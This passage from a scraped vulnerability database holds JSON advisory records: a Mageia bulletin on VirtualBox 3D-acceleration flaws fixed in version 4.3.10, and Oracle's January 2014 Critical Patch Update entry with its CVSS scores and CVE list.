Chromium server via crafted Chromium network pointer in a CR_MESSAGE_READBACK or CR_MESSAGE_WRITEBACK message to the VBoxSharedCrOpenGL service, which triggers an arbitrary pointer dereference and memory corruption (CVE-2014-0981). Multiple array index errors in programs that are automatically generated by VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py in Oracle VirtualBox 4.2.x through 4.2.20 and 4.3.x before 4.3.8, when using 3D Acceleration, allow local guest OS users to execute arbitrary code on the Chromium server via certain CR_MESSAGE_OPCODES messages with a crafted index, which are not properly handled (CVE-2014-0983). The virtualbox packages has been updated to 4.3.10 maintenance release that resolves theese issues and other upstream reported issues (for more info check the referenced changelog). This update also resolves the following: \\- load virtualbox modules on install (mga#8826) \\- missing GUI translations (mga#12578) \n", "cvss3": {}, "published": "2014-04-20T18:48:47", "type": "mageia", "title": "Updated virtualbox packages fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5892", "CVE-2014-0404", "CVE-2014-0405", "CVE-2014-0406", "CVE-2014-0407", "CVE-2014-0981", "CVE-2014-0983"], "modified": "2014-04-20T18:48:47", "id": "MGASA-2014-0184", "href": "https://advisories.mageia.org/MGASA-2014-0184.html", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2021-06-08T18:59:32", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply CPU fixes as soon as possible.** This Critical Patch Update contains 144 new security fixes across the product families listed below.\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n", "cvss3": {}, "published": "2014-01-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update - January 2014", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0371", "CVE-2012-3544", "CVE-2014-0400", "CVE-2013-5879", "CVE-2013-5876", "CVE-2013-5889", "CVE-2013-2248", "CVE-2013-5909", "CVE-2007-0008", "CVE-2014-0392", "CVE-2013-5873", "CVE-2013-5858", "CVE-2014-0405", "CVE-2013-5860", "CVE-2014-0367", "CVE-2014-0385", "CVE-2013-5878", "CVE-2006-0999", "CVE-2014-0410", "CVE-2012-4558", "CVE-2014-0398", "CVE-2013-5897", "CVE-2013-2071", "CVE-2014-0404", "CVE-2014-0415", "CVE-2014-0434", "CVE-2013-5884", "CVE-2014-0435", "CVE-2014-0443", "CVE-2013-5870", "CVE-2014-0390", "CVE-2013-5905", "CVE-2013-5880", "CVE-2013-5904", "CVE-2014-0391", "CVE-2013-5888", "CVE-2013-5893", "CVE-2014-0387", "CVE-2013-2251", "CVE-2014-0393", "CVE-2014-0399", "CVE-2012-4605", "CVE-2013-5821", "CVE-2014-0431", "CVE-2013-5898", "CVE-2014-0427", "CVE-2014-0441", "CVE-2013-5900", "CVE-2013-1654", "CVE-2014-0433", "CVE-2014-0375", "CVE-2013-5886", "CVE-2014-0401", "CVE-2014-0396", "CVE-2014-0406", "CVE-2013-5872", "CVE-2014-0440", "CVE-2014-0425", "CVE-2013-5883", "CVE-2013-1862", "CVE-2013-5834", "CVE-2014-0418", "CVE-2014-0373", "CVE-2013-5877", "CVE-2013-5874", "CVE-2014-0439", "CVE-2014-0394", "CVE-2013-5887", "CVE-2014-0408", "CVE-2014-0376", "CVE-2014-0422", "CVE-2014-0419", "CVE-2014-0411", "CVE-2014-0369", "CVE-2014-0366", "CVE-2013-5882", "CVE-2013-5895", "CVE-2003-1067", "CVE-2014-0437", "CVE-2013-5885", "CVE-2013-5901", "CVE-2013-5881", "CVE-2013-2067", "CVE-2014-0389", "CVE-2014-0388", "CVE-2013-5899", "CVE-2014-0412", "CVE-2013-5896", "CVE-2013-3830", "CVE-2014-0417", "CVE-2014-0372", "CVE-2014-0407", "CVE-2013-5910", "CVE-2013-5906", "CVE-2014-0428", "CVE-2013-5891", "CVE-2014-0382", "CVE-2014-0370", "CVE-2013-5808", "CVE-2006-0998", "CVE-2013-2134", "CVE-2013-5871", "CVE-2014-0402", "CVE-2013-2924", "CVE-2013-4310", "CVE-2014-0368", "CVE-2014-0420", "CVE-2013-5853", "CVE-2014-0423", "CVE-2013-2135", "CVE-2013-5868", "CVE-2014-0430", "CVE-2014-0374", "CVE-2013-5875", "CVE-2013-5869", "CVE-2013-5907", "CVE-2014-0377", "CVE-2012-3499", "CVE-2013-5902", "CVE-2013-5894", "CVE-2013-5795", "CVE-2007-0009", "CVE-2013-5892", "CVE-2014-0381", "CVE-2014-0383", "CVE-2014-0424", "CVE-2014-0395", "CVE-2013-4316", "CVE-2014-0379", "CVE-2014-0403", "CVE-2013-5908", "CVE-2014-0386", "CVE-2007-1858", "CVE-2013-5785", "CVE-2014-0445", "CVE-2013-5764", "CVE-2014-0444", "CVE-2014-0378", "CVE-2013-5833", "CVE-2013-1620", "CVE-2013-5890", "CVE-2014-0416", "CVE-2014-0380", "CVE-2014-0438"], "modified": "2014-01-14T00:00:00", "id": "ORACLE:CPUJAN2014-1972949", "href": "https://www.oracle.com/security-alerts/cpujan2014.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Linux)

Description

Related